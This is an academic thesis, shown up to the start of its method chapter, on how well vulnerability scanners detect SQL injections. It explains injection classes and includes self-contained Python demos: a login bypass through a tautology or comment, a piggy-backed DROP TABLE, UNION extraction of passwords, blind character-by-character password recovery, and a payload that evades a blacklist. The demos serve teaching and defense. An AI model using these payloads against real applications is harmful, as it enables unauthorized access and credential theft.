
Institutionen för systemteknik

Department of Electrical Engineering

Examensarbete

Measuring Accuracy of Vulnerability Scanners

An Evaluation with SQL Injections

Examensarbete utfört i Datateknik

vid Tekniska högskolan vid Linköpings universitet av

Alexander Norström

LiTH-ISY-EX--14/4748--SE

Linköping 2014

Department of Electrical Engineering
Linköpings tekniska högskola, Linköpings universitet
SE-581 83 Linköping, Sweden


Measuring Accuracy of Vulnerability Scanners

An Evaluation with SQL Injections

Examensarbete utfört i Datateknik

vid Tekniska högskolan vid Linköpings universitet

av

Alexander Norström

LiTH-ISY-EX--14/4748--SE

Handledare: Dr. Teodor Sommestad

FOI, Totalförsvarets forskningsinstitut, Linköping

Examinator: Jan-Åke Larsson

ISY, Linköpings universitet


Avdelning, Institution / Division, Department: Avdelningen för Informationskodning, Department of Electrical Engineering, SE-581 83 Linköping
Datum / Date: 2014-03-14
Språk / Language: Engelska/English
Rapporttyp / Report category: Examensarbete

URL för elektronisk version

http://urn.kb.se/resolve?urn=urn:nbn:se:liu:diva-XXXXX

ISBN: —
ISRN: LiTH-ISY-EX--14/4748--SE
Serietitel och serienummer / Title of series, numbering: —
ISSN: —

Titel / Title

Mätning av noggrannhet bland sårbarhetsskannrar
Measuring Accuracy of Vulnerability Scanners

Författare / Author

Alexander Norström

Sammanfattning / Abstract

Web application vulnerabilities of critical severity are commonly found in web applications. The arguably most problematic class of web application vulnerabilities is SQL injections. SQL injection vulnerabilities can be used to execute commands on the database coupled to the web application, e.g., to extract the web application's usernames and passwords. Black box testing tools are often used (both by system owners and their adversaries) to discover vulnerabilities in a running web application. Hence, how well they perform at discovering SQL injection vulnerabilities is of importance. This thesis describes an experiment assessing detection capability for different SQL injection vulnerabilities under different conditions. In the experiment the following is varied: SQL injection vulnerability (17 instances allowing tautologies, piggy-backed queries, and logically incorrect queries), scanner (four products), exploitability (three levels), input vector (POST/GET), and time investment (three levels). The number of vulnerabilities detected is largely determined by the choice of scanner (30% to 77%) and the input vector (71% or 38%). The interaction between the scanner and input vector is substantial, since two scanners cannot handle the POST vector at all. Substantial differences are also found between how well different SQL injection vulnerabilities are detected, and the more exploitable variants are detected more often, as expected. The impact of time spent on the scan interacts with the scanner (some scanners required considerable time to configure and others did not), and as a consequence the relationship between time investment and detection capability is non-trivial.

Nyckelord


Abstract

Web application vulnerabilities of critical severity are commonly found in web applications. The arguably most problematic class of web application vulnerabilities is SQL injections. SQL injection vulnerabilities can be used to execute commands on the database coupled to the web application, e.g., to extract the web application's usernames and passwords. Black box testing tools are often used (both by system owners and their adversaries) to discover vulnerabilities in a running web application. Hence, how well they perform at discovering SQL injection vulnerabilities is of importance. This thesis describes an experiment assessing detection capability for different SQL injection vulnerabilities under different conditions. In the experiment the following is varied: SQL injection vulnerability (17 instances allowing tautologies, piggy-backed queries, and logically incorrect queries), scanner (four products), exploitability (three levels), input vector (POST/GET), and time investment (three levels). The number of vulnerabilities detected is largely determined by the choice of scanner (30% to 77%) and the input vector (71% or 38%). The interaction between the scanner and input vector is substantial, since two scanners cannot handle the POST vector at all. Substantial differences are also found between how well different SQL injection vulnerabilities are detected, and the more exploitable variants are detected more often, as expected. The impact of time spent on the scan interacts with the scanner (some scanners required considerable time to configure and others did not), and as a consequence the relationship between time investment and detection capability is non-trivial.


Contents

1 Introduction 1
1.1 Purpose 2
1.2 Outline 2
2 SQL Injections and Vulnerability Scanners 5
2.1 Different types of web attacks 5
2.2 SQL injections 6
2.2.1 Tautologies 7
2.2.2 Incorrect Queries 8
2.2.3 Piggy-Backed Queries 8
2.2.4 Union Queries 8
2.2.5 Stored Procedures 9
2.2.6 Inference 9
2.2.7 Alternate Encodings 10
2.3 Scope of this study 10
2.4 Variables influencing vulnerability scanning effectiveness 11
2.4.1 Actions covered 11
2.4.2 Time, experience, and tuning of scanners 12
2.4.3 Protection techniques used by the application 12
2.4.4 Scanner/Scan-method 12
2.4.5 Scan barriers 12
2.4.6 Input vector 13
2.4.7 Database management system 13
2.5 Previous studies of web and SQL vulnerability scanning 13
3 Method 15
3.1 Experimental design 15
3.2 Dependent variables 16
3.3 Independent variables 17
3.3.1 SQL Injection Vulnerabilities 17
3.3.2 Input vector 18
3.3.3 Difficulty of Exploitation 18
3.3.4 Scanner 19
3.4 Nuisance variables 19
3.4.1 Experience and time investment 19
3.4.2 Choice of Database management system 20
3.4.3 Scan Barriers 20
3.4.4 Exploited Action 20
4 Result 21
4.1 Difficulty of Exploitation 21
4.2 Scanner 22
4.3 Input vector 22
4.4 SQL vulnerabilities 22
4.5 Interactions and variable importance 24
4.5.1 The importance of input vector when comparing difficulty and scanners 25
4.5.2 Difference in Detection rate between Vulnerabilities 26
5 Discussion 29
5.1 Summary of variable influence 29
5.1.1 Input vector 29
5.1.2 Scanner 30
5.1.3 Vulnerabilities 30
5.1.4 Difficulty of Exploitation 30
5.1.5 Time 30
5.2 Threats against Validity and Reliability 31
5.2.1 Vulnerabilities 31
5.2.2 Constant Database 31
5.2.3 The choice of scanners 32
5.2.4 Experience and skill 32
5.2.5 Inconsistent scanning behavior 32
5.2.6 Results of Input Sanitation versus Pattern matching 33
5.2.7 Other variables not included 33
5.3 Advice to practitioners and developers 34
5.3.1 Consider POST Scanners 34
5.3.2 Think about inconsistent behaviors 34
5.3.3 Time is money 34
5.3.4 Look at other scanners 34
5.3.5 Plan beyond SQL injections 35
5.3.6 Implement continuous scanning and automated testing 35
5.3.7 Check for false positives 35
6 Conclusion 37
A Complete Table of Observations 41
B Grouped tables of Observations 51


1 Introduction

The web applications of tomorrow are all about data: collecting data from databases and processing it into new information for fun and profit. If attackers can get access to and influence this data, they can take the fun and profit for themselves. With the increasing popularity of the web as a platform for applications, the threats posed against web applications need to be taken seriously. According to OWASP, a worldwide organization focused on improving the security of software, the biggest threat against web applications is injection attacks, such as SQL (Structured Query Language) injections and cross-site scripting OWASP [2013]. Verizon states that web applications are a popular target in larger organizations: 56% of all recorded breaches were against a web application, and web applications account for 39% of the compromised records Verizon [2012]. As such, the overall security of web applications must be considered poor. SQL injection attacks are by far the most common and dangerous vulnerability in web applications. OWASP publishes a top 10 list of vulnerabilities every third year. In the top 10 report from 2007 SQL injection attacks ranked second, but in the two following reports, for 2010 and 2013, injection vulnerabilities are ranked first OWASP [2013]. In addition, SQL injections are the highest ranked category in the SANS Institute list of the 25 most dangerous software errors Martin et al. [2011].

Fortunately, there are tools available that can be used to detect these vulnerabilities before they are exploited by an adversary. A vulnerability scanner can detect major problems, which in turn can be mitigated by the security team. However, these vulnerability scanners are not omniscient. Thus we need to know more about what these tools can and cannot do, in order to make informed assumptions about what we can use them for and to what extent they can be trusted. Studies of web application vulnerability scanners have shown that there is quite a difference in the results between scanners. It has also been shown that scanners produce a large percentage of false positives and that they leave many vulnerabilities undetected Bau et al. [2010], Doupé et al. [2010], Fonseca et al. [2007]. These previous studies have looked at several types of vulnerabilities in web applications, such as cross-site scripting, cross-channel scripting, cross-site request forgery, SQL injections, and malware presence. In this thesis we focus on SQL injections because they represent the most common and dangerous vulnerabilities found in web applications and because these weaknesses are easily and often exploited by attackers. In addition, SQL injection vulnerabilities have a low remediation cost and are comparatively easy to detect, making vulnerability scanners an interesting defensive tool Martin et al. [2011]. This thesis describes an experiment in which a web application was constructed with a known set of vulnerabilities, where each vulnerability was verified in advance. We chose to construct a new application to test against, instead of using an existing one, in order to have better control over the constraints and vulnerabilities it included. The application was then used in a set of controlled experiments where different vulnerability scanners were run against it. The scanners were then evaluated based on which vulnerabilities they detected. The vulnerabilities present in the web application were chosen to represent a wide range of conditions that could be present in real web applications. The results of these experiments show how the detection capabilities depend on these conditions and on the scanner in use.

1.1 Purpose

The purpose of this thesis is to describe the current state of web vulnerability scanners when it comes to detecting SQL injections in web applications. Accordingly, our research question is to what extent we can rely on vulnerability scanners to discover and mitigate these vulnerabilities in our web applications under different conditions. The scope is limited to scanners that can be used without access to the source code of the application. These scanners are of particular interest as they report the same result for both product owners and adversaries.

1.2 Outline

The second chapter introduces concepts and background facts about SQL injections and vulnerability scanners. It establishes the taxonomy used later to define the experiment. The method used and the definition of the experiment are described in the third chapter. The fourth chapter follows with the results obtained from the experiment. It presents the results from individually studying each of the independent variables that were varied during the experiment. Following that, an analysis of the interactions between the variables and a general discussion about the results are presented in the fifth chapter. The last chapter then concludes and presents the important findings of this thesis. The rest is appendices containing data tables and the references used in the thesis.


2 SQL Injections and Vulnerability Scanners

In this chapter we give some background on the field of SQL injections and vulnerability scanners. We also introduce the classification taxonomies which are used throughout the thesis.

2.1 Different types of web attacks

This section covers how different types of web attacks can be classified based on their attack life cycle. The taxonomy by Álvarez and Petrović [2003] defines the life cycle of a web attack in a structured and logical way. A taxonomy is a classification scheme that partitions a body of knowledge and defines the relationship between the parts Howard and Longstaff [1998]. The suggested life cycle is split into nine categories:

1. Entry point: The targeted application system. Our target is the web appli-cation itself.

2. Vulnerability: The weakness in the system that allows unauthorized actions. They define five types: Code injection, Canonicalization, HTML manipulation, Overflows, and Misconfigurations. We are only interested in a subset of Code injection, namely SQL injections.

3. Service (under threat): What type of security service the attack poses a threat against. This classification is of no interest to us.

4. Action: What vulnerability type the attack exploits.

5. Length: Number of arguments passed in the request. Can be Expected or Unexpected. Used to trigger buffer overflows and is therefore of no interest to us.

6. HTTP element: The user input fields used to perform the attack.

7. Target: The aim of the attack. Can be either the web application or the platform. Only the web application is of interest, where application data and functionality will be affected.

8. Scope: Whom the attack affects, such as a single user or a group of users. Can be either local (impact limited to a single user or a small group of users) or universal (all users are affected, e.g. by database manipulation). Our experiment will focus on universal attacks.

9. Privileges: Whether the attack escalates privileges. Only applicable if the targeted service is Authentication, which is of no interest to us, so neither is this category.

This taxonomy describes SQL injections from an environmental viewpoint, but it does not give a clear classification of the technical aspects involved in the SQL injection. However, it does still provide useful context on the overall vulnerability. It can be used to describe the attack vectors that are used by the attacker to reach his goal. To do this, the authors refer to the concept of an attack life cycle, where the life cycle is defined as the chain of events that the attack incurs when passing through the web stack of the application. The nine steps of the life cycle represent the order of stages the attacker has to complete. First, he has to pass the entry point to the application. The entry point would contain a vulnerability, which in turn would threaten a service. He then exploits an action in that service performed by the application, using some input vector that is transmitted by the web stack to a target within the scope of the application, gaining some unintended privileges.

2.2 SQL injections

SQL (Structured Query Language) is a special-purpose programming language used to query relational database management systems (DBMS) for data. The language is based upon relational algebra and consists of operations for data definition and manipulation. It includes operations for data creation, reading, updating, and deletion. Vendors that use SQL typically extend the language with additional functionality that includes, but is not limited to, schema and access control management. Furthermore, vendors often add procedural elements that make it possible to create programs within the DBMS itself.

SQL injection is an attack in which malicious code is inserted into a string that is later passed as a query to the DBMS for parsing and execution. The attack is performed by including additional input, crafted to resemble SQL statements, in the entry fields of the web application. If there is a SQL injection vulnerability, this input is processed by the web application in an insecure manner and the crafted input is assembled with the real SQL query, changing the behavior of the web application. As an example of a SQL injection, let's consider the following SQL statement (\ denotes that the line continues without a linefeed):


SELECT * FROM users \

WHERE username = 'Alice' AND password='secret'

This SQL statement tries to fetch a row from the DBMS where the username equals Alice and her password is secret. If both these fields match, the DBMS will return the user record for Alice and allow Alice to log on to the web application. If the attacker can provide the values for the username and password parameters in the example via a login page (i.e., change Alice and secret to something else) he would be able to inject his own code into the statement. For instance, the attacker can craft parameters that modify the statement to always return a match for the user Alice. He performs this attack by injecting database escape code into either the username or the password parameter, for example a username or password that abruptly ends the SQL statement by marking the rest of it as a programmer's comment. If the attacker enters the username Alice' -- the two dashes remove everything to the end of the line, and the statement sent to the database would be the following:

SELECT * FROM users \

WHERE username='Alice' -- AND password='clueless'

This statement would return any record where the username is Alice, as the double dash (--) in the statement marks the rest of the row as a comment (i.e. something that is not to be executed).

Another way the attacker can bypass the check for both fields is to add an additional criterion which always evaluates to true. This is called a tautology and will be explained in detail later. Such a statement could be constructed by escaping the password parameter with a single quote (i.e. ') followed by a true statement (e.g. clueless' OR '1'='1). The attacker would then modify the statement to something like this:

SELECT * FROM users \

WHERE username='Alice' AND password='clueless' OR '1'='1'

The statement above always evaluates to true, because the condition '1'='1' holds even when the preceding conditions do not.
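The two bypasses above can be reproduced end to end. The following is a minimal sketch using Python's built-in sqlite3 module; the table, data, and function names are illustrative stand-ins, not part of the thesis experiment:

```python
import sqlite3

# In-memory database with a hypothetical users table.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('Alice', 'secret')")

def login_unsafe(username, password):
    # Vulnerable: user input is concatenated directly into the SQL string.
    query = ("SELECT * FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    return db.execute(query).fetchone() is not None

# Normal use: a wrong password fails.
assert login_unsafe("Alice", "clueless") is False

# Tautology: OR '1'='1' makes the WHERE condition always true.
assert login_unsafe("Alice", "clueless' OR '1'='1") is True

# Comment injection: the trailing -- removes the password check entirely.
assert login_unsafe("Alice' --", "anything") is True

def login_safe(username, password):
    # Parameterized query: input is bound as data, never parsed as SQL.
    row = db.execute("SELECT * FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row is not None

# The same payload no longer works against bound parameters.
assert login_safe("Alice", "clueless' OR '1'='1") is False
```

The contrast between `login_unsafe` and `login_safe` also illustrates the standard remediation: the injection exists only because the input string is parsed as SQL.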

Halfond et al. [2006] proposed a taxonomy for the classification of technical aspects involved in SQL injections. This taxonomy is described below. Alternative classification schemes can be found in Álvarez and Petrović [2003], Fong and Okun [2007], and Shin and Williams [2008].

2.2.1 Tautologies

The goal of these attacks is to inject code into the conditional statements of the SQL query to modify their behavior to always evaluate to either true or false under every possible interpretation. Another name for this attack is Boolean-based attack. The intent behind this type of attack varies, but usually it is used to bypass authentication or to extract data from the system Halfond et al. [2006].


The injections are triggered by injecting invalid input into the conditional fields in the WHERE section of a query, but can also be combined with input from other sections of the query, such as the GROUP BY or ORDER BY sections. To successfully exploit the system, the injected input has to change the conditional statement of the WHERE clause to always evaluate to the same result. In other words, the DBMS will interpret the query as either true or false regardless of whether the provided parameters (like username and password) match the content of the database or not.

2.2.2 Incorrect Queries

An attacker can try to inject invalid statements into the query so that the database system discloses information about the underlying database schema and queries. An attack of this sort can be used by the attacker to gather information about the database system for further attacks.

The attacker can extract information from the database system with these incorrect queries by observing the behavior of the application when executing them. If the application is not configured to handle errors in a quiet way, it can return a default error message when an incorrect query is executed. The error message returned from the system is often so descriptive that the attacker can easily extract information about injectable parameters in the query, so that new exploits can be crafted to utilize these vulnerabilities and fulfill the attacker's intent.
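The information leak can be seen directly in the raw DBMS error. A minimal sketch, again using sqlite3 with an illustrative table and helper name (not from the thesis experiment):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")

def search_unsafe(term):
    # Vulnerable: the search term is concatenated into the query string.
    query = "SELECT username FROM users WHERE username = '%s'" % term
    return db.execute(query).fetchall()

# A stray single quote breaks the SQL syntax. If the application forwards
# the raw DBMS error to the user, the attacker learns that the parameter
# is injectable and gets hints about the query structure.
leaked = ""
try:
    search_unsafe("O'Brien")
except sqlite3.OperationalError as err:
    leaked = str(err)

# The error text reveals a parse failure to the attacker.
assert "syntax" in leaked
```

A hardened application would instead log the error server-side and return a generic message, which is exactly what pushes attackers toward the inference techniques of section 2.2.6.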

2.2.3 Piggy-Backed Queries

In some systems the database abstraction layer supports the evaluation of multiple SQL queries in each call. By supporting this functionality the developer can invoke several queries at the same time. However, it may also allow an attacker to append entirely different queries that the developer did not intend.

In this attack the goal is not to modify the query into performing something different. Instead the attacker extends the query by inserting additional queries using what is called a query delimiter, allowing the attacker to perform other queries than what is possible with, for example, tautologies. In the end the database will execute all queries as normal, including the attacker's new queries, and it is therefore possible to perform queries that cannot be achieved by merely modifying existing ones. This attack can be very harmful as it allows the attacker to issue any type of query that the current database user is allowed to execute, such as creating new administration accounts, invoking system commands, or installing backdoors in the database server.
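The effect of a multi-statement database layer can be simulated with sqlite3: `execute` refuses more than one statement per call, while `executescript` behaves like the permissive abstraction layers described above. The table and payload are illustrative assumptions:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT)")
db.execute("INSERT INTO users VALUES ('Alice')")

# Hypothetical injected input: a query delimiter (;) followed by a second,
# entirely unrelated statement, with -- commenting out the trailing quote.
payload = "x'; DROP TABLE users; --"
query = "SELECT * FROM users WHERE username = '%s'" % payload

# A database layer that evaluates multiple statements per call (simulated
# here with executescript) runs the attacker's DROP TABLE as well.
db.executescript(query)

tables = db.execute(
    "SELECT name FROM sqlite_master WHERE type='table'").fetchall()
assert tables == []  # the users table is gone
```

Note that sqlite3's single-statement `execute` would have rejected the same payload, which is one reason restrictive database APIs are considered a mitigation for this attack class.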

2.2.4 Union Queries

This type of attack is used to extract data from the database by exploiting a parameter to change the resulting data set returned by the database. The attacker changes the result by injecting a UNION SELECT statement into the existing one. Doing so, the attacker appends data from other tables and system variables onto the original data set the database would return. Examples include extracting account details such as passwords or credit card numbers.
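A union query can be demonstrated with the same sqlite3 setup; the tables and column layout below are illustrative assumptions, not the thesis test application:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (name TEXT, price TEXT)")
db.execute("INSERT INTO products VALUES ('pen', '1.50')")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('Alice', 'secret')")

def product_search_unsafe(name):
    # Vulnerable: the product name is concatenated into the query.
    query = "SELECT name, price FROM products WHERE name = '%s'" % name
    return db.execute(query).fetchall()

# The injected UNION SELECT must match the column count of the original
# query; it appends rows from the users table onto the product result set.
payload = "pen' UNION SELECT username, password FROM users --"
rows = product_search_unsafe(payload)
assert ('Alice', 'secret') in rows
```

The requirement that the column counts (and, in stricter DBMSs, the column types) line up is why real attacks often start with incorrect-query probing to learn the shape of the original statement.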

2.2.5 Stored Procedures

Some types of database management systems allow the creation and usage of stored procedures within a database. A stored procedure is a user-defined function that has the power to execute statements on behalf of another user. This makes stored procedures useful for implementing specialized access control. Let's make an example with a booking system: assume the anonymous user may not read or write to the reservation table. In this case the anonymous user can call a stored procedure that is executed as the receptionist user, which has write access, to make a new reservation. However, if the stored procedure is improperly implemented, the anonymous user could escalate his privileges to get the receptionist's access. An example of such a bad implementation is to concatenate SQL statements and evaluate them inside the stored procedure. The recommended practice is to bind data to variables and use these variables in queries instead. If the stored procedure evaluates SQL statements from strings, an attacker could execute any type of SQL statement in the database. A notable feature of stored procedures is that they can also be used as triggers on database events, such as INSERT INTO, UPDATE, and DELETE on tables. If the attacker were to create such a trigger, he could insert a backdoor into the database and possibly collect input data before it is stored to disk. The attacker can then intercept and collect, for example, plaintext passwords and other secret data before they are encrypted and stored to disk.

2.2.6 Inference

This attack class is used by an attacker to discover vulnerable parameters or database schemas, or to extract data. The attack is performed by modifying the SQL statements to perform a specific action only if a condition evaluates to true or false. Even if the attacker cannot extract information directly from the database, the attacker can use inference to conclude what the actual data might be, by injecting statements that trigger some response depending on the value of the actual data. In contrast to the incorrect-query attack, inference is therefore a useful tool when attacking applications that are configured not to respond with error codes or other messages that signal whether an attack was successful. Two types of inference are blind injection and timing attacks. With a blind injection it is possible to deduce whether the injected statement was successful based on the response from the server when asking true/false questions. Even if the server does not respond with an error, the outcome can be inferred from the fact that the response will contain slightly different output for a normally functioning page versus a page that is expected to be broken. If, for some reason, the responses do not differ between a functional and a broken page, a time-based attack can be used instead. Timing attacks use a similar approach to blind injection attacks, but instead of deducing information from the true/false responses given by the web application, time-consuming queries are given to the web application. By measuring the response time needed by the web application to process the request, it is possible to deduce whether the attack was successful against the database or not.
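Blind injection can be sketched as a loop of true/false questions. Below, a hypothetical application page is simulated by a function that only ever reports "row found" or "no row", never an error, yet the secret is recovered character by character. Table, data, and helper names are illustrative assumptions:

```python
import sqlite3
import string

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('Alice', 'secret')")

def page_ok(username):
    # Simulated application response: True if the query matched a row,
    # False otherwise. No error messages ever reach the attacker.
    query = "SELECT * FROM users WHERE username = '%s'" % username
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False

# Ask one true/false question per character: "is character N of the
# password equal to X?" and observe which page variant comes back.
recovered = ""
for pos in range(1, 7):
    for ch in string.ascii_lowercase:
        probe = "Alice' AND substr(password, %d, 1) = '%s" % (pos, ch)
        if page_ok(probe):
            recovered += ch
            break

assert recovered == "secret"
```

A timing attack follows the same loop but replaces the `substr` comparison with a conditionally slow expression and measures response time instead of page content.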

2.2.7 Alternate Encodings

Sometimes the application may be developed with defensive coding practices or use other prevention techniques to protect against SQL injections. One technique is to simply reject certain input patterns from the user. An attacker can circumvent these protection schemes by encoding his input in a way that avoids detection by the defensive mechanisms. The attacker can use the same range of attacks as discussed earlier, but he must encode them to change the syntactic format, avoiding detection while keeping the semantics the same. Therefore alternate encoding cannot be considered a separate attack; rather, it is used as an evasion technique in conjunction with another attack. Alternate encoding is still very useful and often needed, as defensive coding practices often include scanning input for certain bad characters in order to sanitize the input data.
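The evasion idea can be shown with a deliberately naive, signature-based input filter (an assumption for illustration; real filters are more elaborate). The well-known tautology is blocked, but a syntactically different condition with the same semantics slips through:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('Alice', 'secret')")

# A naive, signature-based blacklist of known tautology patterns.
BAD_PATTERNS = ["'1'='1", "1=1"]

def login_filtered(username, password):
    for field in (username, password):
        if any(p in field.lower() for p in BAD_PATTERNS):
            return False  # input rejected by the filter
    # Still vulnerable behind the filter: plain string concatenation.
    query = ("SELECT * FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    return db.execute(query).fetchone() is not None

# The textbook tautology matches a signature and is rejected...
assert login_filtered("Alice", "x' OR '1'='1") is False

# ...but an alternate encoding of the same condition gets through:
# '2'>'1' is syntactically different yet just as universally true.
assert login_filtered("Alice", "x' OR '2'>'1") is True
```

This is the core argument against blacklist filtering: the defender must enumerate every encoding, while the attacker only needs one that was missed.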

2.3 Scope of this study

The taxonomies presented in this chapter are not fully compatible with the needs we have in the experiment. To handle this, we have chosen the parts we need for the experiment from these taxonomies. In relation to the life cycle model presented above, we treat its categories as follows in this thesis:

1. Entry point: Only the web application is targeted.
2. Vulnerability: Only SQL injections are targeted.
3. Service (under threat): Don't care.

4. Action: Don't care.
5. Length: Don't care.

6. HTTP element: Used to describe the user input needed to trigger the vulnerability in our experiment.

7. Target: Only the web application is targeted.

8. Scope: We assume universal scope for the experiment.
9. Privileges: Don't care.

The steps in the life cycle are complemented with the taxonomy for SQL injection attacks presented in sections 2.2.1-2.2.7. We consider SQL injection attacks based on tautologies, incorrect queries, piggy-backed queries, and union queries. In summary, this thesis has the following scope.


Entry point: Web application
Vulnerability: Tautologies, Incorrect Queries, Piggy-Backed Queries, Union Queries
HTTP elements: GET/POST/Query parameters
Target: Web application
Scope: Universal impact

2.4 Variables influencing vulnerability scanning effectiveness

A web vulnerability scanner is a tool that automatically examines web applications for security faults Fong and Okun [2007]. The tool can either search for application-specific vulnerabilities by fingerprinting the system components and comparing the result against a vulnerability database, or try the more aggressive method of probing the application for design and coding errors, such as illegal input and buffer overflows.

These tools can perform a number of steps when analyzing web applications. The vulnerability scanner maps the structure of a web application by crawling through its web pages and examining each page for input sources, links, and other relations. When the structure of the application has been explored, the scanner starts a penetration test against the input vectors discovered during the exploration phase. A penetration test is an active analysis of the web application that injects carefully crafted input into the various input sources that were discovered. The application will interpret the input and produce output accordingly. The vulnerability scanner observes the output of the application during these injections and deduces information about potential vulnerabilities based on the application's responses. This makes a vulnerability scanner useful for purposes such as searching for, identifying, and mitigating vulnerabilities in new and existing applications. In the following sections, factors believed to influence detection capabilities are described.
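The probe-and-observe step at the heart of such a scanner can be sketched in a few lines. The "endpoint" below is a Python function simulating a vulnerable page (a hypothetical stand-in; a real scanner would crawl and send HTTP requests), and the scanner simply injects a lone quote and looks for an error signature in the response:

```python
import sqlite3

# Simulated vulnerable endpoint: takes GET-style parameters as a dict
# and returns an HTML-ish response string.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE items (name TEXT)")
db.execute("INSERT INTO items VALUES ('pen')")

def app(params):
    query = "SELECT name FROM items WHERE name = '%s'" % params.get("q", "")
    try:
        rows = db.execute(query).fetchall()
        return "<ul>%s</ul>" % "".join("<li>%s</li>" % r[0] for r in rows)
    except sqlite3.Error as err:
        # Sloppy error handling: the raw DBMS error leaks into the page.
        return "<b>Database error:</b> %s" % err

def scan(endpoint, param):
    # Injection probe: a lone single quote should break the SQL syntax of
    # a vulnerable query; an error signature in the response flags it.
    response = endpoint({param: "'"})
    return "error" in response.lower()

assert scan(app, "q") is True  # the 'q' parameter looks injectable
```

Real scanners layer many refinements on this loop (multiple payloads per parameter, response differencing for blind injection, crawl-state management), but the observe-the-response principle is the same.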

2.4.1 Actions covered

Web applications may contain several different actions that can be performed. The taxonomy from section 2.1 introduces the following action types: Read, Modify, Delete, Fabricate, Impersonate, Bypass, Search, Interrupt, Probe, and Other for all those that do not fall under the first nine classes Álvarez and Petrović [2003]. If a scanner is to detect vulnerabilities in web applications, it needs at least one scanning method that can detect each of these cases.

2.4.2 Time, experience, and tuning of scanners

It is generally assumed that the operator's previous experience and the time invested in using a particular scanner will yield better scanning results Acunetix [2012]. An experienced operator should outperform an inexperienced operator when given the same task and the same tool.

2.4.3 Protection techniques used by the application

If the application uses some protection technique to mitigate attacks, this may influence the scanner's effectiveness. For example, an application can be implemented with filters that prevent or treat certain keywords in the input parameters differently from expected input. There are two issues with this. First, the scanner will not be able to detect application logic that depends on keywords defined in the application, as the scanner cannot know these keywords unless the source of the application is analyzed before the scan. The other problem is that while the application can now protect itself from some injection attacks, it can still be vulnerable to others, since it would be impractical to predict every possible input that could trigger a vulnerability in the entire system. Therefore we assume that the "exploitability" (difficulty) of triggering a vulnerability in the application is related to the scanner's ability to test for and analyze how input is handled by the application.

2.4.4 Scanner/Scan-method

The methods and techniques used by the scanner to probe the application are expected to be of some importance. The different methods include white-box testing with static analysis, which can utilize methods such as context-free grammars, use of secure coding practices, lexical analysis, data-flow analysis, and taint analysis (e.g. Pixy Jovanovic et al. [2006]), and black-box testing (e.g. SecuBat Kals et al. [2006]), where the scanner searches for vulnerabilities by mapping the application and comparing responses against a signature database, either using known attacks or probing for unexpected behavior with different techniques (e.g. fuzzing) Huang et al. [2004].

2.4.5 Scan barriers

Web applications may have application-specific barriers that can be confusing and hard for the scanner to understand. Scan barriers are not a protection technique for the system; they are application logic that normal users can and will handle with ease, but that could require extra supervision when used with a scanner. For example, typical scan barriers include requirements for the users to authenticate with the application before use, or answering challenges when submitting data.


2.4.6 Input vector

The scanner has to support the attack vectors that are required to trigger vulnerabilities in the application. This can be support for different input methods in the application, like the HTTP verbs presented in the taxonomy, but also less used HTTP verbs such as PUT and DELETE. At the same time, it can also be required to craft and analyze header responses from the server. All these different input vectors change the attack vector the scanner has to use to trigger the vulnerability in the system. Changing the attack vector requires the scanner to perform the scan with other input variables using a different input source. The input variables are sent and received at the endpoint of the web application. Depending on the scanner's choice of data submission, the application will perform different tasks.

2.4.7 Database management system

The DBMS that is used in the system could influence the number of vulnerabilities detected by the scanners when tests against specific vendors are conducted. For example, the language used when talking to a DBMS is SQL, and the standardized portion of SQL as a language is very limited in its capabilities. Therefore different vendors have extended SQL with their own functionality that is specific to their product. This functionality, and the scanners' way of handling it, may influence the detection capabilities.

2.5 Previous studies of web and SQL vulnerability scanning

Bau et al. [2010] evaluated eight black-box scanners' effectiveness in detecting vulnerabilities. They found that scanners, in general, are adapted to detecting straightforward historical vulnerabilities which have been found in popular applications or textbooks. In addition, they found that black-box scanners show room for improvement in other cases, such as advanced and second-order forms of SQL injections. They highlight that low detection rates for the advanced types of SQL injections may be due to more systematic flaws in the scanners themselves, and discuss a few ways that scanners could be improved for these vulnerability types, such as novel and non-standard keywords. They also reason that the low coverage results and false positives have to do with active content and scripting languages on the site, such as Silverlight, Flash, Java applets, and JavaScript. A previous study by Fonseca et al. [2007] found that scanners vary in their results and recommended using several scanners when searching for vulnerabilities in a web application. The study also finds that the best vulnerability scanner for SQL injection was not the best vulnerability scanner for cross-site scripting and vice versa. Furthermore, they concluded that there was a high rate of false positives in their experiment, while at the same time saying that the scanners failed to detect several vulnerabilities, without presenting any results on what these vulnerabilities are.

Several other studies have focused on benchmarking different vulnerability scanners to compare their effectiveness, see Bau et al. [2010], Halfond and Orso [2006], Shin and Williams [2008], Elia et al. [2010]. One issue with some of these benchmarks is that they don't go into any details regarding the vulnerability types that are used in the tests or the detection rate for them. For example, the study performed by Bau et al. [2010] shows that the average vulnerability detection rate for SQL injections was 21.4% and relates that result to other vulnerability categories (malware, information leakage, configuration error, session management, SQL injections, CSRF, XCS, XSS). Thus, it is largely unknown how different factors influence the detection rate you get when you search for SQL injections.

The tools used to test for vulnerabilities are new and immature Curphey and Arawo [2006]. The experiment presented in this thesis provides more recent data on the effectiveness of vulnerability scanners and addresses some of the issues not handled in the tests described above. For example, the experiment investigates different types of SQL injection vulnerabilities. This experiment will focus on assessing the detection capabilities of vulnerability scanners when tested against a custom-built web application. In this setup we're able to vary the vulnerabilities, scanners, difficulty of exploitation, input vectors, and time investment used for each test.

3 Method

To answer the research question presented in section 1.1, a series of experiments was performed. The focus of these experiments was to evaluate how good black box web vulnerability scanners are at detecting different types of SQL injections in web applications.

3.1 Experimental design

